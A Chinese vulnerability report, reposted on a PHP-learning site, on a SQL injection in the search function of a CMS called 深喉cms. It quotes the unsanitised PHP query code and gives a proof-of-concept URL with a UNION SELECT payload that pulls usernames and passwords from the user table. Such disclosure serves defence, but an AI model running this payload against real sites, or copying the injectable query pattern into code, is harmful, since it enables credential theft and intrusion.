来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 简要描述:深喉cms中由于对数据处理不严导致一个SQL注射漏洞详细说明:global $db,$request;$keyword = urldecode($request[#39;keyword#39;]);switch($modelName){case #39;article#39;:$sql = sele......
|
简要描述: $keyword = urldecode($request['keyword']); switch($modelName) { case 'article': $sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc"; return $db->get_results($sql); break;
http://www.2cto.com /foo/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 漏洞证明:
修复方案: 作者:路人甲 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
